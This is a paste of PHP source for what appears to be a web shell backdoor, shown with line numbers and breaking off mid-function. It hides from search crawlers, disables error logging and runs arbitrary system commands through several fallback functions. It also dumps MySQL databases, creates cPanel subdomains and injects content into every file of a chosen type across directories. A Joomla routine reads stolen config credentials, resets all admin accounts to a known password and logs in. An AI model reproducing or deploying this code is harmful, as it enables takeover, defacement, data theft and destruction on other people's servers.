· 10 years ago · Dec 10, 2015, 07:18 PM
1<?php
2
3// Set Username & Password
4$user = "LiquidAlpha";
5$pass = "28.11.2015";
6$bgimage = 'https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQEf8qywo64XLB71a94TesoQCY61bzc60Onk-ULaUeoDQHC8xyI'; // Background Image
7$my_shell_style = "orange"; // "phizo", "Dh4ni", "404", "orange"
8@set_magic_quotes_runtime(0);
9@ini_set('error_log',NULL);
10@ini_set('log_errors',0);
11ob_start();
12error_reporting(0);
13@set_time_limit(0);
14@ini_set('max_execution_time',0);
15@ini_set('output_buffering',0);
16
17if(!empty($_SERVER['HTTP_USER_AGENT']))
18{
19 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
20 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21 header('HTTP/1.0 404 Not Found');
22 exit; }
23}
24// Dump Database
25if($_GET["action"] == "dumpDB")
26{
27 $self=$_SERVER["PHP_SELF"];
28 if(isset($_COOKIE['dbserver']))
29 {
30 $date = date("Y-m-d");
31 $dbserver = $_COOKIE["dbserver"];
32 $dbuser = $_COOKIE["dbuser"];
33 $dbpass = $_COOKIE["dbpass"];
34 $dbname = $_GET['dbname'];
35 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
36
37 $file = "Dump-$dbname-$date";
38
39 $file="Dump-$dbname-$date.sql";
40 $fp = fopen($file,"w");
41
42 function write($data)
43 {
44 global $fp;
45
46 fwrite($fp,$data);
47
48 }
49 mysql_connect ($dbserver, $dbuser, $dbpass);
50 mysql_select_db($dbname);
51 $tables = mysql_query ("SHOW TABLES");
52 while ($i = mysql_fetch_array($tables))
53 {
54 $i = $i['Tables_in_'.$dbname];
55 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
56 write($create['Create Table'].";");
57 $sql = mysql_query ("SELECT * FROM ".$i);
58 if (mysql_num_rows($sql)) {
59 while ($row = mysql_fetch_row($sql)) {
60 foreach ($row as $j => $k) {
61 $row[$j] = "'".mysql_escape_string($k)."'";
62 }
63 write("INSERT INTO $i VALUES(".implode(",", $row).");");
64 }
65 }
66 }
67
68 fclose ($fp);
69
70 header("Content-Disposition: attachment; filename=" . $file);
71 header("Content-Type: application/download");
72 header("Content-Length: " . filesize($file));
73 flush();
74
75 $fp = fopen($file, "r");
76 while (!feof($fp))
77 {
78 echo fread($fp, 65536);
79 flush();
80 }
81 fclose($fp);
82 }
83}
84$hs_dhanush = "<style type=\"text/css\">
85<!--
86
87body,td,th {
88 color: #FF0000;
89 font-size: 14px;
90}
91tr:hover.lines
92{
93background-color:#000000;}
94tr.lines
95{
96background-color:#0C0C0C;}
97div.fixedbox
98{
99 width:70%;
100 padding:8px;
101 background-color:#171717;
102 position:fixed;
103 left:15%;
104 top:120px;
105 box-shadow: 0px 0px 10px #000;
106 -moz-border-radius: 5px 5px 5px 5px;
107 -webkit-border-radius: 5px 5px 5px 5px;
108 border-radius: 5px 5px 5px 5px;
109}
110div.logindiv{
111background-color:#171717; }
112table.btmtbl{
113border-collapse:collapse;
114border-color:red;}
115td.btmtbl{
116border-color:red;}
117input.but {
118 background-color:#000000;
119 color:#FF0000;
120 border : 1px solid #1B1B1B;
121}
122a:link {
123 color: #00FF00;
124 text-decoration:none;
125 font-weight:500;
126}
127a:hover {
128 color:#00FF00;
129 text-decoration:underline;
130}
131font.txt
132{
133 color: #00FF00;
134 text-decoration:none;
135 font-size:14px;
136}
137font.om
138{
139 color: #00FF00;
140}
141/* Write Permission Font */
142font.wrtperm
143{
144 color:#00FF00;
145}
146/* Read Permission Font */
147font.readperm
148{
149 color:#FF0000;
150}
151/* No Permission Font */
152font.noperm
153{
154 color:#FFFFFF;
155}
156font.mainmenu
157{
158 color:#FF0000;
159 text-decoration:none;
160 font-size:14px;
161}
162a:visited {
163 color: #FF0000;
164}
165input.box
166{
167 background-color:#0C0C0C;
168 color: lime;
169 border : 1px solid #1B1B1B;
170 -moz-border-radius:6px;
171 width:400;
172 border-radius:6px;
173}
174input.sbox
175{
176 background-color:#0C0C0C;
177 color: lime;
178 border : 1px solid #1B1B1B;
179 -moz-border-radius:6px;
180 width:180;
181 border-radius:6px;
182}
183select.sbox
184{
185 background-color:#0C0C0C;
186 color: lime;
187 border : 1px solid #1B1B1B;
188 -moz-border-radius:6px;
189 width:180;
190 border-radius:6px;
191}
192select.box
193{
194 background-color:#0C0C0C;
195 color: lime;
196 border : 1px solid #1B1B1B;
197 -moz-border-radius:6px;
198 width:400;
199 border-radius:6px;
200}
201
202textarea.box
203{
204 border : 3px solid #111;
205 background-color:#161616;
206 color : lime;
207 margin-top: 10px;
208 -moz-border-radius:7px;
209 border-radius:7px;
210}
211body {
212 background-color:#000000;
213}
214.myphp table
215{
216 width:100%;
217 padding:18px 10px;
218 border : 1px solid #1B1B1B;
219}
220.myphp td
221{
222 background:#111111;
223 color:#00ff00;
224 padding:6px 8px;
225 border-bottom:1px solid #222222;
226 font-size:14px;
227}
228.myphp th, th
229{
230 background:#181818;
231
232}
233-->
234</style>";
235$hs_orange = "<style type=\"text/css\">
236<!--
237body {
238background-image:url($bgimage);
239background-color:#000000;
240background-repeat:no-repeat;
241background-attachment:fixed;
242}
243/* Shell Title Color*/
244span.headtitle
245{
246 color:#F90;
247 text-decoration:none;
248
249}
250/* Login Page div*/
251div.logindiv
252{
253background-color:#000000;
254opacity:0.5;
255width:50%;
256border-radius:7px;
257margin-top:150px;
258-moz-border-radius:25px;
259height:410px;
260border: solid 1px
261#878787;
262border-radius: 13px;
263box-shadow: 0px 0px 10px
264black;
265}
266div.fixedbox
267{
268 width:70%;
269 padding:8px;
270 background-color:#171717;
271 position:fixed;
272 left:15%;
273 top:120px;
274 box-shadow: 0px 0px 35px #000;
275 -moz-border-radius: 5px 5px 5px 5px;
276 -webkit-border-radius: 5px 5px 5px 5px;
277 border-radius: 5px 5px 5px 5px;
278}
279table.tbl
280{
281border:#F90;
282}
283body,td,th {
284 color: #F90;
285 font-size: 14px;
286}
287table.btmtbl{
288border-collapse:collapse;
289border-color:#F90;}
290td.btmtbl{
291border-color:#F90;}
292/* Present Working Directory Table */
293table.pwdtbl
294{
295 border-color:#F90;
296}
297/* File List Hover */
298tr.lines:hover
299{
300background-color:#666666;
301opacity:0.5;
302}
303/* File List */
304tr.lines
305{
306 height:12px;
307}
308/* Functions Config */
309td.myfun
310{
311 display: inline;
312 padding: 1px;
313 margin: 5px;
314 border: 1px solid #AAA;
315 border-radius: 4px;
316 -moz-border-radius:4px;
317 box-shadow: 0px 0px 2px #000;
318}
319/* Functions Config Hover */
320td.myfun:hover
321{
322 box-shadow: 0px 0px 2px #FF0;
323}
324/* Button Config */
325input.but {
326 border: 1px solid #F90;
327 background-color:#000000;
328 color:#FFFFFF;
329
330 box-shadow: 0px 0px 2px #F90 inset;
331}
332/* Link Config */
333a:link {
334 color: #F90;
335 text-decoration:none;
336 font-weight:500;
337}
338/* Link Config Hover */
339a:hover {
340 color:#666666;
341 text-decoration:underline;
342}
343/* Link Config Visited */
344a:visited {
345 color: #F90;
346 text-decoration:none;
347}
348/* font Config */
349font.txt
350{
351 color: #FFFFFF;
352 text-decoration:none;
353 font-size:13px;
354}
355font.om
356{
357 color: #F90;
358}
359/* Function Font Config */
360font.fun
361{
362 color:#F90;
363}
364/* Write Permission Font */
365font.wrtperm
366{
367 color:#F90;
368}
369/* Read Permission Font */
370font.readperm
371{
372 color:#FF0000;
373}
374/* No Permission Font */
375font.noperm
376{
377 color:#FFFFFF;
378}
379/* Upload File Config */
380input.upld
381{
382 width:400;
383 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
384}
385/* Input TextBox Config */
386input.box
387{
388 width:400;
389 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
390}
391/* Input Small TextBox Config */
392input.sbox
393{
394 width:180;
395 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
396}
397/* Input Small SelectBox Config */
398select.sbox
399{
400 width:180;
401 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
402}
403/* Input SelectBox Config */
404select.box
405{
406 width:400;
407 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
408}
409/* TextArea Config */
410textarea.box
411{
412 border: 1px solid #F90;
413 color:#FFFFFF;
414 margin-top: 10px;
415 box-shadow: 0px 0px 3px #F90 inset;
416 background-color: #000000;
417 opacity: 0.50;
418}
419.myphp table
420{
421 width:100%;
422 padding:18px 10px;
423 border: 1px solid #F90;
424}
425.myphp td
426{
427 padding:6px 8px;
428 border-bottom:1px solid #222222;
429 font-size:14x;
430}
431
432-->
433</style>";
434$hs_404 = "<style type=\"text/css\">
435<!--
436span.headtitle
437{
438 color:#00ff00;
439 text-decoration:none;
440
441}
442body, th{
443 color:#00ff00;
444 background-color:#000000;
445 font-size: 13px;
446}
447div.logindiv{
448background-color:#171717; }
449div.fixedbox
450{
451 width:70%;
452 padding:8px;
453 background-color:#171717;
454 position:fixed;
455 left:15%;
456 top:120px;
457 box-shadow: 0px 0px 35px #000;
458 -moz-border-radius: 5px 5px 5px 5px;
459 -webkit-border-radius: 5px 5px 5px 5px;
460 border-radius: 5px 5px 5px 5px;
461}
462table.tbl
463{
464border:#00ff00;
465}
466table.btmtbl{
467border-collapse:collapse;
468border-color:lime;}
469td.btmtbl{
470border-color:lime;}
471tr.lines:hover
472{
473 background-color:#5e5e5e;
474}
475tr.lines
476{
477 background-color:#000000;
478 height:12px;
479 font-size: 14px;
480}
481td.myfun
482{
483 border-style:none;
484 margin: 5px;
485}
486td.myfun:hover
487{
488 box-shadow: 0px 0px 2px #FF0;
489}
490input.but {
491 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
492}
493a:link {
494 color: #00ff00;
495 text-decoration:none;
496 font-weight:500;
497}
498a:visited
499{
500color:#00ff00;
501}
502a:hover {
503 background:#ff0000;
504}
505font.mainmenu
506{
507 font-size:14px;
508}
509font.txt
510{
511 color: #FFFFFF;
512 text-decoration:none;
513 font-size:13px;
514}
515font.om
516{
517 color:#00FF00;
518}
519font.fun
520{
521
522 color:#00ff00;
523}
524font.wrtperm
525{
526 color:#00ff00;
527}
528font.readperm
529{
530 color:#FF0000;
531}
532font.noperm
533{
534 color:#FFFFFF;
535}
536input.upld
537{
538 width:400;
539 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
540}
541input.box
542{
543 width:400;
544 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
545}
546input.sbox
547{
548 width:180;
549 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
550}
551select.sbox
552{
553 width:180;
554 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
555}
556select.box
557{
558 width:400;
559 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
560}
561
562textarea.box
563{
564 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
565}
566.myphp table
567{
568 width:100%;
569 padding:18px 10px;
570 border : 1px solid #00FF00;
571}
572.myphp td
573{
574 background:#111111;
575 color:#00ff00;
576 padding:6px 8px;
577 border-bottom:1px solid #222222;
578 font-size:13px;
579}
580.myphp th,
581{
582 background:#181818;
583
584}
585-->
586</style>";
587$hs_phizo = "<style type=\"text/css\">
588<!--
589span.headtitle
590{
591 color:#000000;
592 text-decoration:none;
593
594}
595div.logindiv
596{
597background-color:#CCC;
598width:50%;
599border-radius:7px;
600margin-top:150px;
601-moz-border-radius:25px;
602height:410px;
603border: solid 1px
604#878787;
605border-radius: 13px;
606box-shadow: 0px 0px 10px
607black;
608}
609div.fixedbox
610{
611 width:70%;
612 padding:8px;
613 background-color:#999999;
614 position:fixed;
615 left:15%;
616 top:120px;
617 box-shadow: 0px 0px 10px #000;
618 -moz-border-radius: 5px 5px 5px 5px;
619 -webkit-border-radius: 5px 5px 5px 5px;
620 border-radius: 5px 5px 5px 5px;
621}
622body,td,th {
623 color: #000000;
624 font-size: 14px;
625}
626table.pwdtbl
627{
628 width:95%;
629 background-color:#999999;
630 -moz-border-radius:25px;
631 border-radius:25px;
632}
633table#maintable
634{
635 background-color: #999999;
636 border: solid 1px #878787;
637 border-radius: 13px;
638 box-shadow: 0px 0px 10px #000;
639 width: 100%;
640 margin: auto;
641 height: auto;
642}
643tr.lines:hover
644{
645background-color:#C0C0C0;
646}
647tr.lines
648{
649 background-color:#999999;
650 height:12px;
651}
652td.myfun
653{
654 display: inline;
655 padding: 1px;
656 margin: 5px;
657 border: 1px solid #AAA;
658 border-radius: 4px;
659 -moz-border-radius:4px;
660 box-shadow: 0px 0px 2px #000;
661}
662td.myfun:hover
663{
664 box-shadow: 0px 0px 2px #FF0;
665}
666input.but {
667 border: 1px solid #787878;
668 border-radius: 5px;
669 box-shadow: 0px 0px 2px #000 inset;
670}
671a:link,a:visited {
672 color: #000000;
673 text-decoration:none;
674 font-weight:500;
675}
676a:hover {
677 color:#666666;
678 text-decoration:underline;
679}
680font.mainmenu
681{
682 display: inline;
683 padding: 1px;
684 border: 1px solid #AAA;
685 border-radius: 4px;
686 box-shadow: 0px 0px 2px #000;
687 text-decoration: none;
688 font-weight: bold;
689 color: #696969;
690}
691font.txt
692{
693 color: #000000;
694 text-decoration:none;
695 font-size:13px;
696}
697font.om
698{
699 color:#000000;
700}
701font.fun
702{
703 color: #696969;
704}
705font.wrtperm
706{
707 color:#000000;
708}
709font.readperm
710{
711 color:#000000;
712}
713font.noperm
714{
715 color:#000000;
716}
717input.upld
718{
719 border: 1px solid #787878;
720 box-shadow: 0px 0px 3px #000 inset;
721 background-color: #AAA;
722 font-family: Courier;
723 -moz-border-radius:6px;
724 width:400;
725 border-radius:6px;
726}
727input.box
728{
729 border: 1px solid #787878;
730 box-shadow: 0px 0px 3px #000 inset;
731 background-color: #AAA;
732 font-family: Courier;
733 -moz-border-radius:6px;
734 width:400;
735 border-radius:6px;
736}
737input.sbox
738{
739 border: 1px solid #787878;
740 box-shadow: 0px 0px 3px #000 inset;
741 background-color: #AAA;
742 font-family: Courier;
743 -moz-border-radius:6px;
744 width:180;
745 border-radius:6px;
746}
747select.sbox
748{
749 border: 1px solid #787878;
750 box-shadow: 0px 0px 3px #000 inset;
751 background-color: #AAA;
752 font-family: Courier;
753 -moz-border-radius:6px;
754 width:180;
755 border-radius:6px;
756}
757select.box
758{
759 border: 1px solid #787878;
760 box-shadow: 0px 0px 3px #000 inset;
761 background-color: #AAA;
762 font-family: Courier;
763 -moz-border-radius:6px;
764 width:400;
765 border-radius:6px;
766}
767
768textarea.box
769{
770 border: 1px solid #787878;
771 margin-top: 10px;
772 -moz-border-radius:7px;
773 box-shadow: 0px 0px 3px #000 inset;
774 background-color: #AAA;
775}
776textarea:focus
777{
778 box-shadow: 0px 0px 3px #FF0 inset;
779}
780body {
781 background-color:#C0C0C0;
782}
783.myphp table
784{
785 width:100%;
786 padding:18px 10px;
787 border : 1px solid #1B1B1B;
788}
789.myphp td
790{
791 /*background:#111111; */
792 color:#000000;
793 padding:6px 8px;
794 border-bottom:1px solid #222222;
795 font-size:14px;
796}
797.myphp th, th
798{
799 background:#999999;
800
801}
802-->
803</style>";
804
805 if($_COOKIE['style']=='dhanush')
806 $shellstyle = $hs_dhanush;
807 elseif($_COOKIE['style']=='404')
808 $shellstyle = $hs_404;
809 elseif($_COOKIE['style']=='orange')
810 $shellstyle = $hs_orange;
811 elseif($_COOKIE['style']=='phizo')
812 $shellstyle = $hs_phizo;
813 else
814 {
815 if($my_shell_style == "phizo")
816 $shellstyle = $hs_phizo;
817 elseif($my_shell_style=='dhanush')
818 $shellstyle = $hs_dhanush;
819 elseif($my_shell_style=='404')
820 $shellstyle = $hs_404;
821 elseif($my_shell_style=='orange')
822 $shellstyle = $hs_orange;
823 }
824if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
825{
826 $self=$_SERVER["PHP_SELF"];
827 $os = "N/D";
828 $bdmessage = null;
829 $dir = getcwd();
830
831 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
832 $path=explode('/',$url);
833 $curr_url =str_replace($path[count($path)-1],'',$url);
834
835 if(strtolower(substr(PHP_OS,0,3)) == "win")
836 {
837 $SEPARATOR = '\\';
838 $os = "Windows";
839 $directorysperator="\\";
840 }
841 else
842 {
843 $os = "Linux";
844 $directorysperator='/';
845 }
846 function Trail($d,$directsperator)
847 {
848 $d=explode($directsperator,$d);
849 array_pop($d);
850 array_pop($d);
851 $str=implode($d,$directsperator);
852 return $str;
853 }
854
855 function randomt()
856 {
857 $chars = "abcdefghijkmnopqrstuvwxyz023456789";
858 srand((double)microtime()*1000000);
859 $i = 0;
860 $pass = '' ;
861
862 while ($i <= 7)
863 {
864 $num = rand() % 33;
865 $tmp = substr($chars, $num, 1);
866 $pass = $pass . $tmp;
867 $i++;
868 }
869 return $pass;
870 }
871 function make_subdomain($subDomain,$cPanelUser,$cPanelPass,$subindex)
872 {
873 $rootDomain = $_SERVER['SERVER_NAME'];
874 $buildRequest = "/frontend/x3/subdomain/doadddomain.html?rootdomain=" . $rootDomain . "&domain=" . $subDomain . "&dir=public_html/" . $subDomain;
875
876 $openSocket = fsockopen('localhost',2082);
877 if(!$openSocket) {
878 return "Socket error<BR>";
879 }
880
881 $authString = $cPanelUser . ":" . $cPanelPass;
882 $authPass = base64_encode($authString);
883 $buildHeaders = "GET " . $buildRequest ."\r\n";
884 $buildHeaders .= "HTTP/1.0\r\n";
885 $buildHeaders .= "Host:localhost\r\n";
886 $buildHeaders .= "Authorization: Basic " . $authPass . "\r\n";
887 $buildHeaders .= "\r\n";
888
889 fputs($openSocket, $buildHeaders);
890 while(!feof($openSocket)) {
891 fgets($openSocket,128);
892 }
893 fclose($openSocket);
894 // create index file
895 @chdir($subDomain);
896 $file5 = fopen("index.html","w");
897 fputs($file5,$subindex);
898 fclose($file5);
899 $newDomain = "http://" . $subDomain . "." . $rootDomain . "/<BR>";
900
901 return $newDomain;
902}
903
904 // Database functions
905 function listdatabase()
906 {
907 $self=$_SERVER["PHP_SELF"];
908 ?>
909 <br>
910 <form>
911 <table>
912 <tr>
913 <td><input type="text" class="box" name="dbname"></td>
914 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
915 </tr>
916 </table>
917 </form>
918 <br>
919 <?php
920 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
921 $result = mysql_query("SHOW DATABASE");
922 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
923
924 $pDB = mysql_list_dbs( $mysqlHandle );
925 $num = mysql_num_rows( $pDB );
926 for( $i = 0; $i < $num; $i++ )
927 {
928 $dbname = mysql_dbname( $pDB, $i );
929 mysql_select_db($dbname,$mysqlHandle);
930 $result = mysql_query("SHOW TABLES");
931 $num_of_tables = mysql_num_rows($result);
932 echo "<tr>\n";
933 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
934 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
935 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
936 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
937 echo "</tr>\n";
938 }
939 echo "</table>\n";
940 mysql_close($mysqlHandle);
941 }
942
943 function listtable()
944 {
945 $self=$_SERVER["PHP_SELF"];
946 $dbserver = $_COOKIE["dbserver"];
947 $dbuser = $_COOKIE["dbuser"];
948 $dbpass = $_COOKIE["dbpass"];
949 $dbname = $_GET['dbname'];
950 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
951 ?>
952 <br><br>
953 <form>
954 <table>
955
956 <tr>
957 <td><input type="text" class="box" name="tablename"></td>
958 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
959 </tr>
960 </table>
961
962 <br>
963 <form>
964 <table>
965 <tr>
966 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
967 </tr>
968 <tr>
969 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
970 </tr>
971 </table>
972 </form>
973
974 <?php
975
976 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
977
978 mysql_select_db($dbname);
979 $pTable = mysql_list_tables( $dbname );
980
981 if( $pTable == 0 ) {
982 $msg = mysql_error();
983 echo "<h3>Error : $msg</h3><p>\n";
984 return;
985 }
986 $num = mysql_num_rows( $pTable );
987
988 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
989
990 for( $i = 0; $i < $num; $i++ )
991 {
992 $tablename = mysql_tablename( $pTable, $i );
993 $result = mysql_query("select * from $tablename");
994 $num_rows = mysql_num_rows($result);
995 echo "<tr>\n";
996 echo "<td>\n";
997 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
998 echo "</td>\n";
999 echo "<td>\n";
1000 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
1001 echo "</td>\n";
1002 echo "<td>\n";
1003 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
1004 echo "</td>\n";
1005 echo "<td>\n";
1006 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
1007 echo "</td>\n";
1008 echo "<td>\n";
1009 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
1010 echo "</td>\n";
1011 echo "</tr>\n";
1012 }
1013
1014 echo "</table></form>";
1015 mysql_close($mysqlHandle);
1016 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
1017 }
1018
1019
1020 function paramexe($n, $v)
1021 {
1022 $v = trim($v);
1023 if($v)
1024 {
1025 echo '<span><font size=3>' . $n . ': </font></span>';
1026 if(strpos($v, "\n") === false)
1027 echo '<font size=2>' . $v . '</font><br>';
1028 else
1029 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1030 }
1031 }
1032 function injectdir($dir,$filetype,$mode,$lolinject)
1033 {
1034 if (is_dir($dir))
1035 {
1036 $objects = scandir($dir);
1037 foreach ($objects as $object)
1038 {
1039 if ($object != '.' && $object != '..')
1040 {
1041 if (is_dir($dir . '/' . $object))
1042 {
1043 // if we find a directory, do a recursive call
1044 injectdir($dir . '/' . $object,$filetype,$mode,$lolinject);
1045 }
1046 else
1047 {
1048 $file_parts = pathinfo($object);
1049 if($file_parts['extension'] == $filetype)
1050 {
1051 if(($dir . '/' . $object) == getcwd().$_SERVER['SCRIPT_NAME'])
1052 continue;
1053 $fp=fopen($dir . '/' . $object,$mode);
1054 if (fputs($fp,$lolinject))
1055 echo '<br><font class=txt >'.$dir . '/' . $object.' was injected<br></font>';
1056 else
1057 echo '<font >failed to inject '.$dir . '/' . $object.'<BR></font>';
1058 }
1059 }
1060 }
1061 }
1062 }
1063 }
1064 function rrmdir($dir)
1065 {
1066 if (is_dir($dir)) // ensures that we actually have a directory
1067 {
1068 $objects = scandir($dir); // gets all files and folders inside
1069 foreach ($objects as $object)
1070 {
1071 if ($object != '.' && $object != '..')
1072 {
1073 if (is_dir($dir . '/' . $object))
1074 {
1075 // if we find a directory, do a recursive call
1076 rrmdir($dir . '/' . $object);
1077 }
1078 else
1079 {
1080 // if we find a file, simply delete it
1081 unlink($dir . '/' . $object);
1082 }
1083 }
1084 }
1085 // the original directory is now empty, so delete it
1086 rmdir($dir);
1087 }
1088 }
1089
1090 function which($pr)
1091 {
1092 $path = execmd("which $pr");
1093 if(!empty($path))
1094 return trim($path);
1095 else
1096 return trim($pr);
1097 }
1098
1099 function magicboom($text)
1100 {
1101 if (!get_magic_quotes_gpc())
1102 return $text;
1103 return stripslashes($text);
1104 }
1105 function perlshell($command)
1106 {
1107 $perl=new perl();
1108 ob_start();
1109 $perl->eval("system('".$command."')");
1110 $exec=ob_get_contents();
1111 ob_end_clean();
1112 return $exec;
1113}
1114function execmd($cmd,$d_functions="None")
1115{
1116 if($d_functions=="None")
1117 {
1118 $ret=passthru($cmd);
1119 return $ret;
1120 }
1121 $funcs=array("shell_exec","exec","passthru","system","popen","perl_func");
1122 $d_functions=str_replace(" ","",$d_functions);
1123 $dis_funcs=explode(",",$d_functions);
1124 foreach($funcs as $safe)
1125 {
1126 if(!in_array($safe,$dis_funcs))
1127 {
1128 if($safe=="exec")
1129 {
1130 $ret=@exec($cmd);
1131 $ret=join("\n",$ret);
1132 return $ret;
1133 }
1134 elseif($safe=="system")
1135 {
1136 $ret=@system($cmd);
1137 return $ret;
1138 }
1139 elseif($safe=="passthru")
1140 {
1141 $ret=@passthru($cmd);
1142 return $ret;
1143 }
1144 elseif($safe=="shell_exec")
1145 {
1146 $ret=@shell_exec($cmd);
1147 return $ret;
1148 }
1149 elseif($safe=="popen")
1150 {
1151 $ret=@popen("$cmd",'r');
1152 if(is_resource($ret))
1153 {
1154 while(@!feof($ret))
1155 $read.=@fgets($ret);
1156 @pclose($ret);
1157 return $read;
1158 }
1159 return -1;
1160 }
1161 elseif($safe="proc_open")
1162 {
1163 $cmdpipe=array(
1164 0=>array('pipe','r'),
1165 1=>array('pipe','w')
1166 );
1167 $resource=@proc_open($cmd,$cmdpipe,$pipes);
1168 if(@is_resource($resource))
1169 {
1170 while(@!feof($pipes[1]))
1171 $ret.=@fgets($pipes[1]);
1172 @fclose($pipes[1]);
1173 @proc_close($resource);
1174 return $ret;
1175 }
1176 return -1;
1177 }
1178 elseif($safe=="perl_func")
1179 {
1180 $ret=perlshell($command);
1181 return $ret;
1182 }
1183 }
1184 }
1185 return -1;
1186}
1187 function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
1188 {
1189 $ar0=explode($marqueurDebutLien, $text);
1190 $ar1=explode($marqueurFinLien, $ar0[$i]);
1191 return trim($ar1[0]);
1192 }
1193 function changeindexjo($conf,$h,$site)
1194 {
1195 global $defcount;
1196 $dol = '$';
1197 $sitename = entre2v2($conf,$dol."sitename = '","';");
1198 $username = entre2v2($conf,$dol."user = '","';");
1199 $password = entre2v2($conf,$dol."password = '","';");
1200 $dbname = entre2v2($conf,$dol."db = '","';");
1201 $prefix = entre2v2($conf,$dol."dbprefix = '","';");
1202 $localhost = entre2v2($conf,$dol."host = '","';");
1203
1204 $co=randomt();
1205
1206 $link=mysql_connect($localhost,$username,$password) ;
1207 mysql_select_db($dbname,$link);
1208
1209 $tryChaningInfo = mysql_query("UPDATE ".$prefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
1210
1211 $req =mysql_query("SELECT * from `".$prefix."extensions` ");
1212
1213 if ( $req )
1214 {
1215 $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
1216 $data = mysql_fetch_array($req);
1217 $template_name=$data["template"];
1218
1219 $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
1220 $data = mysql_fetch_array($req);
1221 $template_id=$data["extension_id"];
1222
1223 $url2 = $site_url =$site."/administrator/index.php";
1224
1225 $ch = curl_init();
1226 curl_setopt($ch, CURLOPT_URL, $url2);
1227 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1228 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1229 curl_setopt($ch, CURLOPT_HEADER, 1);
1230 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1231 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1232 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1233
1234 $buffer = curl_exec($ch);
1235
1236 $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
1237 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
1238
1239 $url2=$site_url."/index.php";
1240 $ch = curl_init();
1241 curl_setopt($ch, CURLOPT_URL, $url2);
1242 curl_setopt($ch, CURLOPT_POST, 1);
1243 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
1244 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1245 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1246 curl_setopt($ch, CURLOPT_HEADER, 0);
1247 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1248 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
